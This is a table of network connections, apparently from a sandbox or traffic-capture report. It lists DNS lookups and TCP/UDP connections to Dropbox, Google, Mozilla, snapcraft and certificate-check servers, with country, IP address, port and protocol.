| US | 104.16.99.29:443 | cfl.dropboxstatic.com | udp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | udp |
| US | 1.1.1.1:53 | safebrowsing.googleapis.com | udp |
| US | 1.1.1.1:53 | ucdbc8f3c56f284606b1b243c910.previews.dropboxusercontent.com | udp |
| US | 1.1.1.1:53 | safebrowsing.googleapis.com | udp |
| US | 1.1.1.1:53 | ucdbc8f3c56f284606b1b243c910.previews.dropboxusercontent.com | udp |
| US | 104.16.100.29:443 | cfl.dropboxstatic.com | tcp |
| GB | 142.250.187.202:443 | safebrowsing.googleapis.com | tcp |
| GB | 162.125.64.16:443 | ucdbc8f3c56f284606b1b243c910.previews.dropboxusercontent.com | tcp |
| US | 1.1.1.1:53 | fp2e7a.wpc.phicdn.net | udp |
| US | 1.1.1.1:53 | accounts.google.com | udp |
| US | 1.1.1.1:53 | accounts.google.com | udp |
| GB | 74.125.71.84:443 | accounts.google.com | tcp |
| US | 1.1.1.1:53 | o.pki.goog | udp |
| US | 1.1.1.1:53 | o.pki.goog | udp |
| GB | 172.217.16.227:80 | o.pki.goog | tcp |
| US | 1.1.1.1:53 | beacon.dropbox.com | udp |
| US | 1.1.1.1:53 | beacon.dropbox.com | udp |
| US | 1.1.1.1:53 | fp.dropbox.com | udp |
| US | 1.1.1.1:53 | fp.dropbox.com | udp |
| US | 1.1.1.1:53 | bolt.v.dropbox.com | udp |
| GB | 74.125.71.84:443 | accounts.google.com | udp |
| US | 162.125.21.3:443 | beacon.dropbox.com | tcp |
| US | 162.125.21.3:443 | beacon.dropbox.com | tcp |
| GB | 108.138.217.87:443 | fp.dropbox.com | tcp |
| US | 1.1.1.1:53 | fp2e7a.wpc.phicdn.net | udp |
| US | 1.1.1.1:53 | use1-turn.fpjs.io | udp |
| DE | 3.66.243.164:3478 | use1-turn.fpjs.io | tcp |
| US | 1.1.1.1:53 | www.dropbox.com | udp |
| US | 1.1.1.1:53 | www.dropbox.com | udp |
| GB | 172.217.16.227:80 | o.pki.goog | tcp |
| US | 1.1.1.1:53 | play.google.com | udp |
| US | 1.1.1.1:53 | play.google.com | udp |
| GB | 172.217.16.238:443 | play.google.com | tcp |
| GB | 172.217.16.238:443 | play.google.com | tcp |
| GB | 172.217.16.238:443 | play.google.com | udp |
| US | 1.1.1.1:53 | cdn.dropboxexperiment.com | udp |
| US | 1.1.1.1:53 | cdn.dropboxexperiment.com | udp |
| GB | 13.224.245.108:443 | cdn.dropboxexperiment.com | tcp |
| GB | 13.224.245.108:443 | cdn.dropboxexperiment.com | udp |
| US | 1.1.1.1:53 | ocsp.r2m03.amazontrust.com | udp |
| US | 1.1.1.1:53 | ocsp.r2m03.amazontrust.com | udp |
| GB | 143.204.67.183:80 | ocsp.r2m03.amazontrust.com | tcp |
| US | 1.1.1.1:53 | api.snapcraft.io | udp |
| US | 1.1.1.1:53 | api.snapcraft.io | udp |
| GB | 185.125.188.58:443 | api.snapcraft.io | tcp |
| US | 1.1.1.1:53 | api.snapcraft.io | udp |
| GB | 185.125.188.59:443 | api.snapcraft.io | tcp |
| US | 1.1.1.1:53 | beacon.dropbox.com | udp |
| US | 1.1.1.1:53 | beacon.dropbox.com | udp |
| US | 1.1.1.1:53 | bolt.v.dropbox.com | udp |
| US | 1.1.1.1:53 | www.dropbox.com | udp |
| US | 1.1.1.1:53 | www.dropbox.com | udp |
| US | 1.1.1.1:53 | beacon.dropbox.com | udp |
| US | 1.1.1.1:53 | beacon.dropbox.com | udp |
| US | 1.1.1.1:53 | bolt.v.dropbox.com | udp |
| US | 1.1.1.1:53 | www.dropbox.com | udp |
| US | 1.1.1.1:53 | www.dropbox.com | udp |
| US | 1.1.1.1:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | beacon.dropbox.com | udp |
| US | 8.8.8.8:53 | beacon.dropbox.com | udp |
| US | 8.8.8.8:53 | bolt.v.dropbox.com | udp |
| US | 8.8.8.8:53 | www.dropbox.com | udp |
| US | 8.8.8.8:53 | www.dropbox.com | udp |
| US | 8.8.8.8:53 | beacon.dropbox.com | udp |
| US | 8.8.8.8:53 | beacon.dropbox.com | udp |
| US | 8.8.8.8:53 | bolt.v.dropbox.com | udp |
| US | 8.8.8.8:53 | www.dropbox.com | udp |
| US | 8.8.8.8:53 | www.dropbox.com | udp |